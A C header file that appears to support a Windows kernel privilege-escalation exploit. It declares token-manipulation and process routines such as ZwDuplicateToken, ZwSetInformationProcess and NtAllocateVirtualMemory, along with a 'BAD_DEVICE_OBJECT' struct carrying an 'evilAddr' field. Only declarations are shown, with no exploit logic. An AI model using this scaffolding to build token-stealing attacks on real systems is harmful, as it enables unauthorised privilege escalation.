#pragma once
#define STATUS_UNSUCCESSFUL 0xC0000001

#define InitializeObjectAttributes( p, n, a, r, s ) { \
  (p)->Length = sizeof( OBJECT_ATTRIBUTES );          \
  (p)->RootDirectory = r;                             \
  (p)->Attributes = a;                                \
  (p)->ObjectName = n;                                \
  (p)->SecurityDescriptor = s;                        \
  (p)->SecurityQualityOfService = NULL;               \
}

enum { SystemModuleInformation = 11 };
enum { ProcessAccessToken = 0x09 };

typedef PVOID *PEPROCESS;

typedef PEPROCESS(WINAPI *_PsGetCurrentProcess)(void);

typedef ULONG(__cdecl  *_DbgPrintEx)(_In_ ULONG ComponentId, _In_ ULONG Level, PCHAR  Format, ...);

typedef struct {
	HANDLE UniqueProcess;
	HANDLE UniqueThread;
} CLIENT_ID, *PCLIENT_ID;

typedef NTSTATUS(WINAPI *_NtFsControlFile)(
	HANDLE           FileHandle,
	HANDLE           Event,
	PIO_APC_ROUTINE  ApcRoutine,
	PVOID            ApcContext,
	PIO_STATUS_BLOCK IoStatusBlock,
	ULONG            FsControlCode,
	PVOID            InputBuffer,
	ULONG            InputBufferLength,
	PVOID            OutputBuffer,
	ULONG            OutputBufferLength
	);

typedef NTSTATUS(WINAPI *_NtQuerySystemInformation)(
	SYSTEM_INFORMATION_CLASS SystemInformationClass,
	PVOID SystemInformation,
	ULONG SystemInformationLength,
	PULONG ReturnLength
	);

typedef NTSTATUS(WINAPI *_ZwOpenProcess)(
	PHANDLE            ProcessHandle,
	ACCESS_MASK        DesiredAccess,
	POBJECT_ATTRIBUTES ObjectAttributes,
	PCLIENT_ID         ClientId
	);

typedef NTSTATUS(WINAPI *_ZwDuplicateToken)(
	HANDLE             ExistingTokenHandle,
	ACCESS_MASK        DesiredAccess,
	POBJECT_ATTRIBUTES ObjectAttributes,
	BOOLEAN            EffectiveOnly,
	TOKEN_TYPE         TokenType,
	PHANDLE            NewTokenHandle
	);

typedef NTSTATUS(WINAPI *_ZwOpenProcessToken)(
	HANDLE      ProcessHandle,
	ACCESS_MASK DesiredAccess,
	PHANDLE     TokenHandle
	);

typedef NTSTATUS(WINAPI *_ZwSetInformationProcess)(
	HANDLE   ProcessHandle,
	PROCESSINFOCLASS   ProcessInformationClass,
	PVOID  ProcessInformation,
	ULONG  ProcessInformationLength
	);


typedef DWORD(WINAPI *_NtAllocateVirtualMemory)(
	HANDLE ProcessHandle,
	PVOID *BaseAddress,
	ULONG ZeroBits,
	PULONG RegionSize,
	ULONG AllocationType,
	ULONG Protect
	);

typedef  NTSTATUS(WINAPI *_PsLookupProcessByProcessId)(
	_In_  HANDLE    ProcessId,
	_Out_ PEPROCESS *Process
	);

typedef BOOL(WINAPI *_ZwClose)(
	_In_ HANDLE hObject
	);

typedef struct _PROCESS_ACCESS_TOKEN {
	HANDLE Token;
	HANDLE Thread;
} PROCESS_ACCESS_TOKEN, *PPROCESS_ACCESS_TOKEN;

/* Hacked up from Process Hacker source */
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
	HANDLE Section;
	PVOID MappedBase;
	PVOID ImageBase;
	ULONG ImageSize;
	ULONG Flags;
	USHORT LoadOrderIndex;
	USHORT InitOrderIndex;
	USHORT LoadCount;
	USHORT OffsetToFileName;
	UCHAR  FullPathName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct _RTL_PROCESS_MODULES {
	ULONG NumberOfModules;
	SYSTEM_MODULE_INFORMATION_ENTRY Modules[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef struct {
	ULONG pad1[12];
	DWORD addrPtr;
	ULONG pad2[14];
	DWORD evilAddr;
} BAD_DEVICE_OBJECT, *PBAD_DEVICE_OBJECT;





